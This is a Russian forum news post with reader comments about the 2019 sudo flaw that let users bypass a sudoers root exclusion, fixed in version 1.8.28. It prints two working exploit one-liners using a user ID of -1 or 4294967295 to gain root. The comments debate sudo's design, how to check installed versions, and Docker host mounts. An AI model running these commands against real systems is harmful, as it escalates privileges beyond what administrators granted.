LINUX.ORG.RU

Уязвимость в sudo

 , ,


4

2

Ошибка в sudo позволяет выполнить от пользователя root любой исполняемый файл, если в /etc/sudoers разрешено его выполнение от других пользователей и запрещено для root.

Эксплуатация ошибки очень простая:

sudo -u#-1 id -u <command>

или:

sudo -u#4294967295 id -u <command>

Ошибка присутствует во всех версиях sudo до 1.8.28

Подробности:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html

https://www.sudo.ws/alerts/minus_1_uid.html

>>> Подробности

★★

Проверено: alexferman ()
Последнее исправление: cetjs2 (всего исправлений: 4)
Ответ на: комментарий от drfaust

Используя yaourt, ныть про sudo – это как ныряя в канализации, возмущаться запахом

Siborgium ★★★★★
()
Ответ на: комментарий от drfaust

А я всегда говорил, что sudo - это зло. И не потому что нашли дырку (подобное и в login, и в su может вылезти), а потому, что есть доступ у обычного юзера, даже если админ ему доверяет... Что легче, «договориться» с ответственным админом, или после «облома» у админа «договориться» с двумя-тремя sudo-юзерами?

Это всё интересно, конечно, но это же для терминалов ещё придумано. Неужели в реальности кто-то вот так использует систему? Хз, мультиюзер вряд ли сейчас жив вообще, а если и жив, то контролируется сервером терминалов, а никак не sudo.

nebularia ★★★
()
Ответ на: комментарий от etwrq

Потому что местные знатоки предпочитают делать

sudo --version
вместо
apt-cache policy sudo
и нихрена не видят, что ожидаемо.

A-234 ★★★★★
()

В это время… (на самом деле в 2018 году)

kde-cli-tools 4:5.12.4-1 has a hard dependency on kdesu, which indirectly depends on sudo, making it impossible to upgrade KDE without creating a serious, unnecessary security risk.

We clearly disagree on considering sudo a security concern. At least, not from the kde packaging point of view. I’m downgrading the severity value to wishlist.

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895260

anonymous
()
Ответ на: комментарий от vertexua

Ну вот вам немного свежей документации к докеру: https://docs.docker.com/engine/security/security/

Docker allows you to share a directory between the Docker host and a guest container; and it allows you to do so without limiting the access rights of the container. This means that you can start a container where the /host directory is the / directory on your host; and the container can alter your host filesystem without any restriction.

slonopotamus
()
Ответ на: комментарий от imul

Что не так?

Вот если бы было написано

Ошибка в sudo позволяет выполнить от пользователя root исполняемый файл, прописанный /etc/sudoers, выполнение которого разрешено от имени всех пользователей кроме рута.

Было бы всё так. А сейчас там желтизна. А в исходной версии было вообще 4.2

crutch_master ★★★★★
()
Последнее исправление: crutch_master (всего исправлений: 1)
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.